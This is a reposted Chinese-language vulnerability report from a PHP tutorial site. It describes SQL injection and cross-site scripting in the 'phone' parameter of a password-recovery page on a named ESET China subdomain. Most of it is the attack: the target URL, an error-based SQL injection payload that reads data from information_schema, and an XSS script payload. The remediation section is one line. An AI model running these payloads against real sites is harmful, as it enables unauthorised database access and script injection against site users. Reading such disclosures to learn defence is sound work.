网站地图    收藏   

主页 > 后端 > 网站安全 >

eset分站登录框注入以及跨站 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 参数phone过滤不严,造成注入,以及跨站注入以及跨站地址为 http://jf.eset.com.cn/index.php/user/lookpassphone参数在手机号码处sql:#39; and(select 1 from(select count(*),concat((select (select ......

参数phone过滤不严,造成注入,以及跨站
 
注入以及跨站地址为 http://jf.eset.com.cn/index.php/user/lookpass
phone参数在手机号码处
sql:
' and(select 1 from(select count(*),concat((select (select (select *)) from column_name limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'x'='x
 
xss: '"<script>alert(/90sec luom/);</script>

 
 
修复方案:
给参数phone进行过滤吧。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论